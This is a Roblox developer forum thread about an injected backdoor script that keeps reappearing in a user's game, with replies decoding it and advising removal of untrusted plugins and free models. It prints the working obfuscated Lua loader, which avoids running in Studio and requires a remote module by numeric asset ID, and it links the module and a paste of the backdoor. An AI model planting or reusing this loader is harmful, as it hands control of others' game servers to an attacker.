Unknown scripts appearing in my game

Hello everybody, my name is Koala_Helper.

My problem is these annoying client replicators keep appearing in my game.

Did you add scripts and remove them? And make another game and it happen?

Yes I added scripts. It happened. Then I removed EVERY single script and removed those scripts and like 2 days later, they appear again. And whenever I make a new game, don’t even use scripts at all, unless I write them myself, those ANNOYING client replicator scripts keep appearing in my game.

Here’s some pictures of the code they put in.

If you couldn’t catch it from my pictures, here’s the code they put in.

local uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x39DB7846*(2+2+2-1+2+2-4));end

Does anybody know what I should do? I’m really getting sick of this.

There is either a virus in one of your models or in a plugin that you have.

I would suggest removing a plugin one by on or look for more scripts inside the game and delete them as it is dangerous.

1 Like

Okay, thank you! I will try that.

It’s either a free model or a plugin, I would suggest you stay away from free models if you don’t want these problems.

The script isn’t even obfuscated, you could have easily “deobfuscated” it yourself.

It requires this module: https://www.roblox.com/library/4853422430/Fix-Car

string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))

is the same thing as

require
  1. Remove all plugins you do not trust.
  2. Once you’ve done that, press Command+Shift+F and paste that line there.
  3. When you’ve finished that, it should show you where the other lines like that are (if any.)
  4. You should be good.

What do you mean by…

Just curious.

Basically, they’re saying that this is a simple matter, this is called a backdoor.

Oh. I know what back door means, but I didn’t understand it in those words.

No that is not what I mean. The module that the script provided by OP requires is this one:

(code if you are curious: Some obfuscated backdoor (DO NOT USE) - Pastebin.com)

Now that is obfuscation. I tried dumping its constants but it seemed to be of no help. All I know is that it does something with ServerScriptService.

The module script does have a child, it’s called Script.

Here is that code:

I am going to assume it just clones that script each time.

Oh, sorry, I was confused on that.

You might have a poisoned Model/Plugin. Be sure to check any recent scripts you got from the toolbox or any plugins you downloaded.

It looks like you might have a malicious plugin. I’ve written a guide on dealing with situations like this, check it out:

It’s long, but it works :wink:

You mostlikely have a free model or plugin your game tht has a studio virus, this happens to me all of the time. Remove all un trusted plugins and review every script.